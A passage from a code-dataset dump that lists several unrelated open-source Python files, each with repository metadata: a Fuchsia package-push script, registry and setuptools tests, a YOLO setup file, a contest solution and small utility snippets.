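    print(aps['plugins'])  # maps discovered class names to Profile subclasses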
| 36.528169
| 78
| 0.630037
| 2,480
| 0.478118
| 0
| 0
| 0
| 0
| 0
| 0
| 2,669
| 0.514556
|
4224f59023f612daa74db320160910b42cc05439
| 3,897
|
py
|
Python
|
push-package.py
|
OpenTrustGroup/scripts
|
31ca2ca5bae055113c6f92a2eb75b0c7528902b3
|
[
"BSD-3-Clause"
] | null | null | null |
push-package.py
|
OpenTrustGroup/scripts
|
31ca2ca5bae055113c6f92a2eb75b0c7528902b3
|
[
"BSD-3-Clause"
] | null | null | null |
push-package.py
|
OpenTrustGroup/scripts
|
31ca2ca5bae055113c6f92a2eb75b0c7528902b3
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2017 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import errno
import json
import os
import subprocess
import sys
import tempfile
DEFAULT_DST_ROOT = '/system'
DEFAULT_OUT_DIR = 'out/debug-x64'
def netaddr_cmd(out_dir, device):
path = os.path.join(out_dir, '../build-zircon/tools/netaddr')
command = [
path,
'--fuchsia',
device,
]
return command
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def parse_package_manifest(paths, dst_root):
data = []
for path in paths:
with open(path) as package_manifest:
for line in package_manifest:
items = line.rstrip().split('=')
if len(items) != 2:
raise ValueError('Malformed manifest entry: ' + line)
dst = os.path.join(dst_root, items[0].lstrip('/'))
src = items[1]
data.append([dst, src])
return data
def update_device(device, batch_file, verbose, out_dir):
ssh_config_path = os.path.join(out_dir, 'ssh-keys', 'ssh_config')
try:
netaddr = netaddr_cmd(out_dir, device)
ipv6 = '[' + subprocess.check_output(netaddr).strip() + ']'
except subprocess.CalledProcessError:
# netaddr prints its own errors, no need to add another one here.
return 1
with open(os.devnull, 'w') as devnull:
status = subprocess.call(
['sftp', '-F', ssh_config_path, '-b', batch_file, ipv6],
stdout=sys.stdout if verbose else devnull)
if status != 0:
print >> sys.stderr, 'error: sftp failed'
return status
def scp_everything(devices, package_data, out_dir, name_filter, verbose):
# Temporary file for sftp
count = 0
with tempfile.NamedTemporaryFile() as f:
# Create a directory tree that mirrors what we want on the device.
for entry in package_data:
dst_path = entry[0]
src_path = entry[1]
if name_filter is not None and name_filter not in os.path.basename(
dst_path):
continue
# must "rm" the file first because memfs requires it
print >> f, '-rm %s' % dst_path
print >> f, 'put -P %s %s' % (src_path, dst_path)
count += 1
f.flush()
for device in devices:
if update_device(device, f.name, verbose, out_dir) == 0:
print 'Updated %d files on "%s".' % (count, device)
else:
print 'Update FAILED on "%s"' % device
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'package_files',
nargs='+',
help='Files containing manifest data ' \
'(e.g. out/debug-x64/package/modular*/system_manifest)')
parser.add_argument('-d', '--device', default=[':'], help='Device to update')
parser.add_argument(
'-o',
'--out-dir',
metavar='DIR',
default=DEFAULT_OUT_DIR,
help='Directory containing build products')
parser.add_argument(
'-t',
'--dst-root',
metavar='PATH',
default=DEFAULT_DST_ROOT,
help='Path on device to the directory to copy package products')
parser.add_argument(
'-f',
'--filter',
metavar='FILTER',
help='Push products with a name that contains FILTER')
parser.add_argument(
'-v', '--verbose', action='store_true', help='Display copy filenames')
args = parser.parse_args()
out_dir = args.out_dir or DEFAULT_OUT_DIR
dst_root = args.dst_root or DEFAULT_DST_ROOT
name_filter = args.filter
verbose = args.verbose
package_data = parse_package_manifest(args.package_files, dst_root)
return scp_everything(args.device, package_data, out_dir, name_filter,
verbose)
if __name__ == '__main__':
sys.exit(main())
| 26.691781
| 79
| 0.647164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,060
| 0.272004
|
42260da2bac2d4e5c90292ee2d38da85618b72ad
| 2,355
|
py
|
Python
|
tests/e2e/registry/test_registry_image_push_pull.py
|
OdedViner/ocs-ci
|
e8a3de82650e02cf8fa67284a67c36ced34a480b
|
[
"MIT"
] | null | null | null |
tests/e2e/registry/test_registry_image_push_pull.py
|
OdedViner/ocs-ci
|
e8a3de82650e02cf8fa67284a67c36ced34a480b
|
[
"MIT"
] | null | null | null |
tests/e2e/registry/test_registry_image_push_pull.py
|
OdedViner/ocs-ci
|
e8a3de82650e02cf8fa67284a67c36ced34a480b
|
[
"MIT"
] | null | null | null |
import logging
import pytest
from ocs_ci.framework.testlib import workloads, E2ETest, ignore_leftovers
from ocs_ci.ocs import ocp, registry, constants
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import UnexpectedBehaviour
logger = logging.getLogger(__name__)
class TestRegistryImagePullPush(E2ETest):
"""
Test to check that image push and pull work with a registry backed by OCS
"""
@workloads
@ignore_leftovers
@pytest.mark.polarion_id("OCS-1080")
@pytest.mark.skip("Skip this test due to https://github.com/red-hat-storage/ocs-ci/issues/1547")
def test_registry_image_pull_push(self):
"""
Test case to validate registry image pull and push with OCS backend
"""
image_url = 'docker.io/library/busybox'
# Get openshift registry route and certificate access
registry.enable_route_and_create_ca_for_registry_access()
# Add roles to user so that user can perform image pull and push to registry
role_type = ['registry-viewer', 'registry-editor',
'system:registry', 'admin', 'system:image-builder']
for role in role_type:
registry.add_role_to_user(role_type=role, user=config.RUN['username'])
# Provide write access to registry
ocp_obj = ocp.OCP()
read_only_cmd = (
f"set env deployment.apps/image-registry"
f" REGISTRY_STORAGE_MAINTENANCE_READONLY- -n "
f"{constants.OPENSHIFT_IMAGE_REGISTRY_NAMESPACE}"
)
ocp_obj.exec_oc_cmd(read_only_cmd)
# Pull image using podman
registry.image_pull(image_url=image_url)
# Push image to registry using podman
registry.image_push(
image_url=image_url, namespace=constants.OPENSHIFT_IMAGE_REGISTRY_NAMESPACE
)
# List the images in registry
img_list = registry.image_list_all()
logger.info(f"Image list {img_list}")
# Check either image present in registry or not
validate = registry.check_image_exists_in_registry(image_url=image_url)
if not validate:
raise UnexpectedBehaviour("Image URL not present in registry")
# Remove user roles from User
for role in role_type:
registry.remove_role_from_user(role_type=role, user=config.RUN['username'])
| 36.796875
| 100
| 0.6862
| 2,073
| 0.880255
| 0
| 0
| 1,937
| 0.822505
| 0
| 0
| 914
| 0.38811
|
42274dc240f54ea288091543468dd2eda53a4feb
| 55
|
py
|
Python
|
tOYOpy/settings.py
|
fkab/tOYO
|
b0a7be760a45edd795b8734ce2e5f1ccec35091b
|
[
"MIT"
] | null | null | null |
tOYOpy/settings.py
|
fkab/tOYO
|
b0a7be760a45edd795b8734ce2e5f1ccec35091b
|
[
"MIT"
] | null | null | null |
tOYOpy/settings.py
|
fkab/tOYO
|
b0a7be760a45edd795b8734ce2e5f1ccec35091b
|
[
"MIT"
] | null | null | null |
elements = {
'em': '',
'blockquote': '<br/>'
}
| 11
| 25
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.454545
|
4227bfd2b04f47e94ab893e1b523dca4551e38fc
| 312
|
py
|
Python
|
1.6.py
|
kevrodg/pynet
|
5142b1b75cda658a99348e3550da1c198e7d049e
|
[
"Apache-2.0"
] | null | null | null |
1.6.py
|
kevrodg/pynet
|
5142b1b75cda658a99348e3550da1c198e7d049e
|
[
"Apache-2.0"
] | null | null | null |
1.6.py
|
kevrodg/pynet
|
5142b1b75cda658a99348e3550da1c198e7d049e
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import json
import yaml
my_list = [0, 1, 2, 3, 'whatever', 'hello', {'attribs': [0, 1, 2, 3, 4], 'ip_addr': '10.10.10.239'}]
with open("my_file.json", "w") as f:
json.dump(my_list, f)
with open("my_file.yaml", "w") as f:
f.write(yaml.dump(my_list, default_flow_style=False))
| 20.8
| 101
| 0.61859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 104
| 0.333333
|
42287378bd11599427298e72d96640a19c6fbb44
| 322
|
py
|
Python
|
jp.atcoder/abc069/arc080_a/11903517.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc069/arc080_a/11903517.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc069/arc080_a/11903517.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import sys
n, *a = map(int, sys.stdin.read().split())
def main():
c4 = c2 = 0
for x in a:
if not x % 4:
c4 += 1
elif not x % 2:
c2 += 1
ans = "Yes" if c4 >= n // 2 or c4 * 2 + c2 >= n else "No"
print(ans)
if __name__ == "__main__":
main()
| 16.947368
| 62
| 0.406832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 19
| 0.059006
|
422874e1c950eddb051f58c230d75405855070fc
| 2,277
|
py
|
Python
|
tests/test_url_enc_dec.py
|
FWidm/poe-profile
|
08190dfab88758081ce1ddcd30a43081e2d7863f
|
[
"MIT"
] | 1
|
2018-12-02T19:48:09.000Z
|
2018-12-02T19:48:09.000Z
|
tests/test_url_enc_dec.py
|
FWidm/poe-profile
|
08190dfab88758081ce1ddcd30a43081e2d7863f
|
[
"MIT"
] | null | null | null |
tests/test_url_enc_dec.py
|
FWidm/poe-profile
|
08190dfab88758081ce1ddcd30a43081e2d7863f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
import sys
import unittest
from src.util.tree_codec import encode_hashes, decode_url
url = 'AAAABAMDAQQHBLMGSQj0Dc0OPA5cES0UIBRxFScWbxhWGF0YkRo4HM4c3CSqJy8o-itQLJwy0TWSNuk6UjpYOuE8LUGHRARFR0V-RZ1Ms025TeNQR' \
'1NSVcZZ81qRXz9mnmebaGVodGpDaqxq-mvbcg9yqXasfIN99YIHgseDX4PMg9uFYIhAjLGOvo8akDOQVZLBmK2a4JuKogCmV6asqH2qxKyYrKqtja' \
'3xrj6vp7c-uJO8n7zqvk_AZsT2xq7MvM9-0B_Tj9P72L3ZXtl82mLfsONq5FHqGOvu7IPsiu8O7-vwH_JF8933MvfX-Ov56PrS_Ev-Cv5U_oH-jw=='
decoded = (4, 3, 3, 1, [1031, 1203, 1609, 2292, 3533, 3644, 3676, 4397, 5152, 5233, 5415, 5743, 6230, 6237, 6289,
6712,
7374, 7388, 9386, 10031, 10490, 11088, 11420, 13009, 13714, 14057, 14930, 14936, 15073,
15405,
16775, 17412, 17735, 17790, 17821, 19635, 19897, 19939, 20551, 21330, 21958, 23027, 23185,
24383,
26270, 26523, 26725, 26740, 27203, 27308, 27386, 27611, 29199, 29353, 30380, 31875, 32245,
33287,
33479, 33631, 33740, 33755, 34144, 34880, 36017, 36542, 36634, 36915, 36949, 37569, 39085,
39648,
39818, 41472, 42583, 42668, 43133, 43716, 44184, 44202, 44429, 44529, 44606, 44967, 46910,
47251,
48287, 48362, 48719, 49254, 50422, 50862, 52412, 53118, 53279, 54159, 54267, 55485, 55646,
55676,
55906, 57264, 58218, 58449, 59928, 60398, 60547, 60554, 61198, 61419, 61471, 62021, 62429,
63282,
63447, 63723, 63976, 64210, 64587, 65034, 65108, 65153, 65167])
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_encode(self):
result = encode_hashes(decoded[0],decoded[1],decoded[2],decoded[3],decoded[4])
print(result)
print(url)
self.assertEqual(result,url)
def test_decode(self):
result = decode_url(url)
self.assertEqual(result,decoded)
if __name__ == '__main__':
logger = logging.getLogger()
logger.level = logging.DEBUG
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
unittest.main()
| 42.962264
| 123
| 0.62231
| 363
| 0.15942
| 0
| 0
| 0
| 0
| 0
| 0
| 402
| 0.176548
|
422975ef7721aeaa44f60c6499ab2952315acfbe
| 262
|
py
|
Python
|
_test/registry/reg04.py
|
javacommons/commonthread
|
dff8b39d7c86729e4711b669bcec8eab6f146659
|
[
"Unlicense"
] | null | null | null |
_test/registry/reg04.py
|
javacommons/commonthread
|
dff8b39d7c86729e4711b669bcec8eab6f146659
|
[
"Unlicense"
] | null | null | null |
_test/registry/reg04.py
|
javacommons/commonthread
|
dff8b39d7c86729e4711b669bcec8eab6f146659
|
[
"Unlicense"
] | null | null | null |
# source http://itasuke.hatenablog.com/entry/2018/01/08/133510
import winreg
newkey = winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, r'Software\__javacommons__\abc')
newkey.Close()
winreg.DeleteKeyEx(winreg.HKEY_CURRENT_USER, r'Software\__javacommons__\abc')
| 43.666667
| 87
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 125
| 0.477099
|
422a7283e956bcdda7358ae083a9c572a8121dd9
| 8,289
|
py
|
Python
|
setuptools-37.0.0/pkg_resources/tests/test_working_set.py
|
coderlongren/PreliminaryPython
|
b5c7a87e41842c57aabb660de1514cba19c8bd78
|
[
"MIT"
] | 1
|
2017-09-19T15:21:50.000Z
|
2017-09-19T15:21:50.000Z
|
setuptools-37.0.0/pkg_resources/tests/test_working_set.py
|
coderlongren/PreliminaryPython
|
b5c7a87e41842c57aabb660de1514cba19c8bd78
|
[
"MIT"
] | null | null | null |
setuptools-37.0.0/pkg_resources/tests/test_working_set.py
|
coderlongren/PreliminaryPython
|
b5c7a87e41842c57aabb660de1514cba19c8bd78
|
[
"MIT"
] | 4
|
2017-05-12T09:18:16.000Z
|
2020-08-27T03:26:16.000Z
|
import inspect
import re
import textwrap
import pytest
import pkg_resources
from .test_resources import Metadata
def strip_comments(s):
return '\n'.join(
l for l in s.split('\n')
if l.strip() and not l.strip().startswith('#')
)
def parse_distributions(s):
'''
Parse a series of distribution specs of the form:
{project_name}-{version}
[optional, indented requirements specification]
Example:
foo-0.2
bar-1.0
foo>=3.0
[feature]
baz
yield 2 distributions:
- project_name=foo, version=0.2
- project_name=bar, version=1.0, requires=['foo>=3.0', 'baz; extra=="feature"']
'''
s = s.strip()
for spec in re.split(r'\n(?=[^\s])', s):
if not spec:
continue
fields = spec.split('\n', 1)
assert 1 <= len(fields) <= 2
name, version = fields.pop(0).split('-')
if fields:
requires = textwrap.dedent(fields.pop(0))
metadata=Metadata(('requires.txt', requires))
else:
metadata = None
dist = pkg_resources.Distribution(project_name=name,
version=version,
metadata=metadata)
yield dist
class FakeInstaller(object):
def __init__(self, installable_dists):
self._installable_dists = installable_dists
def __call__(self, req):
return next(iter(filter(lambda dist: dist in req,
self._installable_dists)), None)
def parametrize_test_working_set_resolve(*test_list):
idlist = []
argvalues = []
for test in test_list:
(
name,
installed_dists,
installable_dists,
requirements,
expected1, expected2
) = [
strip_comments(s.lstrip()) for s in
textwrap.dedent(test).lstrip().split('\n\n', 5)
]
installed_dists = list(parse_distributions(installed_dists))
installable_dists = list(parse_distributions(installable_dists))
requirements = list(pkg_resources.parse_requirements(requirements))
for id_, replace_conflicting, expected in (
(name, False, expected1),
(name + '_replace_conflicting', True, expected2),
):
idlist.append(id_)
expected = strip_comments(expected.strip())
if re.match(r'\w+$', expected):
expected = getattr(pkg_resources, expected)
assert issubclass(expected, Exception)
else:
expected = list(parse_distributions(expected))
argvalues.append(pytest.param(installed_dists, installable_dists,
requirements, replace_conflicting,
expected))
return pytest.mark.parametrize('installed_dists,installable_dists,'
'requirements,replace_conflicting,'
'resolved_dists_or_exception',
argvalues, ids=idlist)
@parametrize_test_working_set_resolve(
'''
# id
noop
# installed
# installable
# wanted
# resolved
# resolved [replace conflicting]
''',
'''
# id
already_installed
# installed
foo-3.0
# installable
# wanted
foo>=2.1,!=3.1,<4
# resolved
foo-3.0
# resolved [replace conflicting]
foo-3.0
''',
'''
# id
installable_not_installed
# installed
# installable
foo-3.0
foo-4.0
# wanted
foo>=2.1,!=3.1,<4
# resolved
foo-3.0
# resolved [replace conflicting]
foo-3.0
''',
'''
# id
not_installable
# installed
# installable
# wanted
foo>=2.1,!=3.1,<4
# resolved
DistributionNotFound
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
no_matching_version
# installed
# installable
foo-3.1
# wanted
foo>=2.1,!=3.1,<4
# resolved
DistributionNotFound
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
installable_with_installed_conflict
# installed
foo-3.1
# installable
foo-3.5
# wanted
foo>=2.1,!=3.1,<4
# resolved
VersionConflict
# resolved [replace conflicting]
foo-3.5
''',
'''
# id
not_installable_with_installed_conflict
# installed
foo-3.1
# installable
# wanted
foo>=2.1,!=3.1,<4
# resolved
VersionConflict
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
installed_with_installed_require
# installed
foo-3.9
baz-0.1
foo>=2.1,!=3.1,<4
# installable
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installed_with_conflicting_installed_require
# installed
foo-5
baz-0.1
foo>=2.1,!=3.1,<4
# installable
# wanted
baz
# resolved
VersionConflict
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
installed_with_installable_conflicting_require
# installed
foo-5
baz-0.1
foo>=2.1,!=3.1,<4
# installable
foo-2.9
# wanted
baz
# resolved
VersionConflict
# resolved [replace conflicting]
baz-0.1
foo-2.9
''',
'''
# id
installed_with_installable_require
# installed
baz-0.1
foo>=2.1,!=3.1,<4
# installable
foo-3.9
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installable_with_installed_require
# installed
foo-3.9
# installable
baz-0.1
foo>=2.1,!=3.1,<4
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installable_with_installable_require
# installed
# installable
foo-3.9
baz-0.1
foo>=2.1,!=3.1,<4
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installable_with_conflicting_installable_require
# installed
foo-5
# installable
foo-2.9
baz-0.1
foo>=2.1,!=3.1,<4
# wanted
baz
# resolved
VersionConflict
# resolved [replace conflicting]
baz-0.1
foo-2.9
''',
'''
# id
conflicting_installables
# installed
# installable
foo-2.9
foo-5.0
# wanted
foo>=2.1,!=3.1,<4
foo>=4
# resolved
VersionConflict
# resolved [replace conflicting]
VersionConflict
''',
'''
# id
installables_with_conflicting_requires
# installed
# installable
foo-2.9
dep==1.0
baz-5.0
dep==2.0
dep-1.0
dep-2.0
# wanted
foo
baz
# resolved
VersionConflict
# resolved [replace conflicting]
VersionConflict
''',
'''
# id
installables_with_conflicting_nested_requires
# installed
# installable
foo-2.9
dep1
dep1-1.0
subdep<1.0
baz-5.0
dep2
dep2-1.0
subdep>1.0
subdep-0.9
subdep-1.1
# wanted
foo
baz
# resolved
VersionConflict
# resolved [replace conflicting]
VersionConflict
''',
)
def test_working_set_resolve(installed_dists, installable_dists, requirements,
replace_conflicting, resolved_dists_or_exception):
ws = pkg_resources.WorkingSet([])
list(map(ws.add, installed_dists))
resolve_call = lambda: ws.resolve(
requirements, installer=FakeInstaller(installable_dists),
replace_conflicting=replace_conflicting,
)
if inspect.isclass(resolved_dists_or_exception):
with pytest.raises(resolved_dists_or_exception):
resolve_call()
else:
assert sorted(resolve_call()) == sorted(resolved_dists_or_exception)
| 17.304802
| 87
| 0.55447
| 277
| 0.033418
| 1,037
| 0.125106
| 5,131
| 0.619013
| 0
| 0
| 4,937
| 0.595609
|
422abcc408966dc47c31fc1259795d32236b4832
| 629
|
py
|
Python
|
setup.py
|
Sigel1/yolo-tf2
|
a11c856e601c23220fc2afce7c93e9f8eb4fd339
|
[
"MIT"
] | null | null | null |
setup.py
|
Sigel1/yolo-tf2
|
a11c856e601c23220fc2afce7c93e9f8eb4fd339
|
[
"MIT"
] | null | null | null |
setup.py
|
Sigel1/yolo-tf2
|
a11c856e601c23220fc2afce7c93e9f8eb4fd339
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
install_requires = [dep.strip() for dep in open('requirements.txt')]
setup(
name='yolo_tf2',
version='1.5',
packages=find_packages(),
url='https://github.com/schissmantics/yolo-tf2',
license='MIT',
author='schismantics',
author_email='schissmantics@outlook.com',
description='yolo(v3/v4) implementation in keras and tensorflow 2.5',
setup_requires=['numpy==1.19.5'],
install_requires=install_requires,
python_requires='>=3.7',
entry_points={
'console_scripts': [
'yolotf2=yolo_tf2.cli:execute',
],
},
)
| 27.347826
| 73
| 0.659777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 247
| 0.392687
|
422b18d573ebb1cb612e410eb429acc8c41c02ef
| 224
|
py
|
Python
|
btc_tracker_engine/helper_functions.py
|
metalerk/4btc
|
ee9ec1a6fcea1b489bd8afa9c3a25c025e022cb0
|
[
"MIT"
] | null | null | null |
btc_tracker_engine/helper_functions.py
|
metalerk/4btc
|
ee9ec1a6fcea1b489bd8afa9c3a25c025e022cb0
|
[
"MIT"
] | null | null | null |
btc_tracker_engine/helper_functions.py
|
metalerk/4btc
|
ee9ec1a6fcea1b489bd8afa9c3a25c025e022cb0
|
[
"MIT"
] | null | null | null |
def rate_diff_percentage(previous_rate, current_rate, percentage=False):
diff_percentage = (current_rate - previous_rate) / previous_rate
if percentage:
return diff_percentage * 100
return diff_percentage
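# Illustrative values only (not part of the original module):
if __name__ == '__main__':
    print(rate_diff_percentage(100, 110))                   # (110 - 100) / 100 -> 0.1
    print(rate_diff_percentage(100, 110, percentage=True))  # 10.0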
| 44.8
| 72
| 0.772321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
422b4572706867cc810fb195c7e12772e8a93c86
| 324
|
py
|
Python
|
nngeometry/object/__init__.py
|
amyami187/nngeometry
|
cb516da3f7a019e148f48ff3ef3bed0cdae0d184
|
[
"MIT"
] | 103
|
2020-03-19T08:47:29.000Z
|
2022-03-29T00:54:38.000Z
|
nngeometry/object/__init__.py
|
amyami187/nngeometry
|
cb516da3f7a019e148f48ff3ef3bed0cdae0d184
|
[
"MIT"
] | 29
|
2021-01-07T13:39:20.000Z
|
2022-03-29T14:52:21.000Z
|
nngeometry/object/__init__.py
|
amyami187/nngeometry
|
cb516da3f7a019e148f48ff3ef3bed0cdae0d184
|
[
"MIT"
] | 11
|
2020-11-09T01:07:12.000Z
|
2022-03-29T00:54:41.000Z
|
from .pspace import (PMatDense, PMatBlockDiag, PMatDiag,
PMatLowRank, PMatImplicit,
PMatKFAC, PMatEKFAC, PMatQuasiDiag)
from .vector import (PVector, FVector)
from .fspace import (FMatDense,)
from .map import (PushForwardDense, PushForwardImplicit,
PullBackDense)
| 40.5
| 56
| 0.66358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
422e18702f6c683f268a4b49395a514801fec437
| 834
|
py
|
Python
|
vkwave/bots/core/dispatching/dp/middleware/middleware.py
|
YorkDW/vkwave
|
86b0278f15f398217a8211007c44651b6145831b
|
[
"MIT"
] | null | null | null |
vkwave/bots/core/dispatching/dp/middleware/middleware.py
|
YorkDW/vkwave
|
86b0278f15f398217a8211007c44651b6145831b
|
[
"MIT"
] | null | null | null |
vkwave/bots/core/dispatching/dp/middleware/middleware.py
|
YorkDW/vkwave
|
86b0278f15f398217a8211007c44651b6145831b
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import List, NewType
from vkwave.bots.core.dispatching.events.base import BaseEvent
MiddlewareResult = NewType("MiddlewareResult", bool)
class BaseMiddleware(ABC):
@abstractmethod
async def pre_process_event(self, event: BaseEvent) -> MiddlewareResult:
...
class MiddlewareManager:
def __init__(self):
self.middlewares: List[BaseMiddleware] = []
def add_middleware(self, middleware: BaseMiddleware):
self.middlewares.append(middleware)
async def execute_pre_process_event(self, event: BaseEvent) -> MiddlewareResult:
for middleware in self.middlewares:
m_res = await middleware.pre_process_event(event)
if not m_res:
return MiddlewareResult(False)
return MiddlewareResult(True)
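# Illustrative usage sketch (not part of the original module). LoggingMiddleware
# below is hypothetical, written only to show the contract: return a truthy
# MiddlewareResult to let processing continue, a falsy one to stop it.
class LoggingMiddleware(BaseMiddleware):
    async def pre_process_event(self, event: BaseEvent) -> MiddlewareResult:
        print(f"incoming event: {event!r}")
        return MiddlewareResult(True)

manager = MiddlewareManager()
manager.add_middleware(LoggingMiddleware())
# Inside a dispatcher, an event keeps being processed only when this returns True:
#     allowed = await manager.execute_pre_process_event(event)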
| 29.785714
| 84
| 0.715827
| 641
| 0.768585
| 0
| 0
| 104
| 0.1247
| 381
| 0.456835
| 18
| 0.021583
|
422e499271a923bf090aefdbe25c5651121859de
| 3,517
|
py
|
Python
|
plot_scripts/try_networkx.py
|
gabrielasuchopar/arch2vec
|
1fc47d2cc7d63832e0d6337b8482669366b4aef2
|
[
"Apache-2.0"
] | 35
|
2020-10-22T03:58:23.000Z
|
2022-03-21T12:55:35.000Z
|
plot_scripts/try_networkx.py
|
gabrielasuchopar/arch2vec
|
1fc47d2cc7d63832e0d6337b8482669366b4aef2
|
[
"Apache-2.0"
] | 1
|
2021-06-03T13:49:47.000Z
|
2021-06-06T02:02:11.000Z
|
plot_scripts/try_networkx.py
|
gabrielasuchopar/arch2vec
|
1fc47d2cc7d63832e0d6337b8482669366b4aef2
|
[
"Apache-2.0"
] | 9
|
2020-10-22T14:13:53.000Z
|
2022-03-21T08:06:12.000Z
|
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
def node_match(n1, n2):
if n1['op'] == n2['op']:
return True
else:
return False
def edge_match(e1, e2):
return True
def gen_graph(adj, ops):
G = nx.DiGraph()
for k, op in enumerate(ops):
G.add_node(k, op=op)
assert adj.shape[0] == adj.shape[1] == len(ops)
for row in range(len(ops)):
for col in range(row + 1, len(ops)):
if adj[row, col] > 0:
G.add_edge(row, col)
return G
def preprocess_adj_op(adj, op):
def counting_trailing_false(l):
count = 0
for TF in l[-1::-1]:
if TF:
break
else:
count += 1
return count
def transform_op(op):
idx2op = {0:'input', 1:'conv1x1-bn-relu', 2:'conv3x3-bn-relu', 3:'maxpool3x3', 4:'output'}
return [idx2op[idx] for idx in op.argmax(axis=1)]
adj = np.array(adj).astype(int)
op = np.array(op).astype(int)
assert op.shape[0] == adj.shape[0] == adj.shape[1]
# find all zero columns
adj_zero_col = counting_trailing_false(adj.any(axis=0))
# find all zero rows
adj_zero_row = counting_trailing_false(adj.any(axis=1))
# find all zero rows
op_zero_row = counting_trailing_false(op.any(axis=1))
assert adj_zero_col == op_zero_row == adj_zero_row - 1, 'Inconsistent result {}={}={}'.format(adj_zero_col, op_zero_row, adj_zero_row - 1)
N = op.shape[0] - adj_zero_col
adj = adj[:N, :N]
op = op[:N]
return adj, transform_op(op)
if __name__ == '__main__':
adj1 = np.array([[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op1 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out']
adj2 = np.array([[0, 1, 1, 1, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op2 = ['in', 'conv1x1', 'mp3x3', 'conv3x3', 'out']
adj3 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0]])
op3 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out','out2']
adj4 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]])
op4 = np.array([[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
adj4, op4 = preprocess_adj_op(adj4, op4)
G1 = gen_graph(adj1, op1)
G2 = gen_graph(adj2, op2)
G3 = gen_graph(adj3, op3)
G4 = gen_graph(adj4, op4)
plt.subplot(141)
nx.draw(G1, with_labels=True, font_weight='bold')
plt.subplot(142)
nx.draw(G2, with_labels=True, font_weight='bold')
plt.subplot(143)
nx.draw(G3, with_labels=True, font_weight='bold')
plt.subplot(144)
nx.draw(G4, with_labels=True, font_weight='bold')
nx.graph_edit_distance(G1,G2, node_match=node_match, edge_match=edge_match)
nx.graph_edit_distance(G2,G3, node_match=node_match, edge_match=edge_match)
| 30.582609
| 142
| 0.477396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 304
| 0.086437
|
422eaaa92344214317cacbe394deaa82d7096b9d
| 6,552
|
py
|
Python
|
endpoints/v2/errors.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 2,027
|
2019-11-12T18:05:48.000Z
|
2022-03-31T22:25:04.000Z
|
endpoints/v2/errors.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 496
|
2019-11-12T18:13:37.000Z
|
2022-03-31T10:43:45.000Z
|
endpoints/v2/errors.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 249
|
2019-11-12T18:02:27.000Z
|
2022-03-22T12:19:19.000Z
|
import bitmath
